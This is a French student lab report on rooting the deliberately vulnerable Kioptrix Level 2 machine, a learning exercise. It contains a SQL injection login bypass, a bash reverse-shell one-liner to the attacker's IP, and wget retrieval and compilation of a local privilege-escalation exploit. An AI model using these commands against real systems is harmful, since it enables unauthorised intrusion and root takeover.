Rapport d’exploitation d’une
machine
« Kioptrix Level 2 »
Préparé et simulé par : Ismail El Barhoumi et Zakaria Khilad
Plan du rapport : Exploitation de la machine Kioptrix Level 2 :
1. Introduction
Présentation de la machine Kioptrix Level 2 …………………………………….
Objectifs du projet : identification et exploitation des vulnérabilités
pour obtenir un accès root………………………………………………………………
2. Phase de reconnaissance
Utilisation de Nmap pour l'analyse réseau ……………………………………..
Utilisation de Nmap pour l’analyse des versions……………………………..
3. Analyse des vulnérabilités
. Étude des failles liées à la base de données SQL……………………………...
4. Exploitation
. Utilisation de SQLmap pour exploiter les failles SQL………………………..
. Recherche de vulnérabilités potentielles avec Searchsploit…………….
5. Escalade de privilèges
. Utilisation d’un service apache2…………………………………………………….
. Compilation et exécution du module exploité………………………………..
6. Résultats
. Accès root à la machine…………………………………………………………………
7. Conclusion
1-Introduction :
1-1Présentation de la machine Kioptrix Level 2 :
Kioptrix Level 2 est une machine virtuelle conçue pour servir de plateforme
d'apprentissage et de test dans le domaine de la cybersécurité. Faisant partie d'une série
de défis progressifs, elle simule un environnement vulnérable permettant aux utilisateurs
d’explorer et d’exploiter différentes failles de sécurité.
1-2- Objectifs du projet : identification et exploitation des vulnérabilités pour
obtenir un accès root :
L’objectif principal de ce projet est d’identifier et d’exploiter les vulnérabilités présentes sur
la machine virtuelle Kioptrix Level 2 afin d’obtenir un accès root. Cela inclut :
La reconnaissance des services et des ports ouverts.
L’analyse des vulnérabilités exploitables.
L’utilisation d’outils spécialisés pour exploiter les failles détectées.
L’escalade de privilèges pour atteindre le niveau d’accès administrateur (root).
2. Phase de reconnaissance :
2-1- Utilisation de Nmap pour l'analyse réseau :
Premièrement on a utiliser nmap pour scanner les ports et les services de la machine
kioptrix2
Donc on va utiliser le service mysql et on va acceder via le navigateur on utilisant l’adresse
de machine kioptrix2 192.168.11.109
3. Analyse des vulnérabilités :
3-1-Étude des failles liées à la base de données SQL :
L'étude des vulnérabilités liées à la base de données SQL sur la machine Kioptrix Level 2 a
permis d'identifier une faille critique permettant une injection SQL. Cette faille se situe
dans le champ d'entrée utilisateur de l'application web hébergée, où les données saisies ne
sont pas correctement validées avant d'être intégrées dans les requêtes SQL.
4. Exploitation :
4-1-Utilisation de SQLmap pour exploiter les failles SQL :
on utilise l'injection SQL avec l'opérateur ‘or ‘1=1
Donc c’est correcte maintenent on a accees
Maintenant on va pingé sur la machine kali avec l’ip 192.168.11.110
Donc la machine ping et on a acces avec l’utilisateur apache
-après on va utiliser ce script la bash -i >& /dev/tcp/192.168.11.110/8080 0>&1
On ajoutant l’adresse de machine kali et le port 8080
Cette commande établit une connexion TCP sortante depuis la machine cible vers
l'attaquant à l'adresse IP 192.168.11.110 sur le port 8080.
Une fois la connexion établie, l'attaquant obtient un shell interactif distant sur la machine
cible, lui permettant de :
-Exécuter des commandes.
-Naviguer dans le système de fichiers.
-Exfiltrer des données ou déployer des charges malveillantes supplémentaires.
-Après on va etablir une conection avec la machine cible via Netcat
On a un accés vers la machine kioptrix2
-En suivant on va rechercher la version du Centos via la commande
lsb_release -a
Donc on a une version de Centos 4.5
4-2-Recherche de vulnérabilités potentielles avec Searchsploit :
Maintenant on va utiliser Searchsploit pour trouver les modules pour la version Centos 4.5
Donc on va utiliser le Path : linux_x86/local/9542.c
5- Escalade de privilèges :
5-1-Utilisation d’un service apache2 :
Premièrement on va démarrer un service apache (Serveur Web)
Donc le service est démarrer est activé
-Maintenant on va utiliser la machine kali pour copier l’exploit vers le répertoire de serveur
web /var/www/html
Donc l’exploit est copié vers le répertoire on va utiliser l’étape suivante
5-2-Compilation et exécution du module exploité
On va utiliser la commande wget pour télécharger l’exploit a partir de
Serveur web
Il y’a un probleme on a rencontré l'erreur "Permission denied" lors de l'utilisation de la
commande wget, cela signifie qu’on n'avais pas les permissions nécessaires pour effectuer
l'opération dans le répertoire
-La solution : on va accéder au repertoire /tmp
Ce répertoire a des permissions très ouvertes, ou ont peut écrire, peu importe le statut ou
groupe. Cela permet de stocker des fichiers temporaires.
Et on répétons la commande wget http://192.168.11.110/9542.c
Donc la missions est termine
-Après on va compiler l’exploit 9542.c et on exploit la macine via la commande ./exploit
la machine et exploité
6- Résultats :
6-1- accès root à la machine :
Après la compilation d’exploit on a un accés root a la machine
7- Conclusion :
En conclusion, ce projet a permis de renforcer les compétences pratiques en
matière de tests d'intrusion et de gestion des vulnérabilités. Il a mis en
évidence l'importance de sécuriser les services web et les bases de données
pour prévenir les attaques. Ce genre d'exercice est essentiel pour mieux
comprendre les techniques d'attaque et ainsi renforcer la sécurité des
systèmes en production.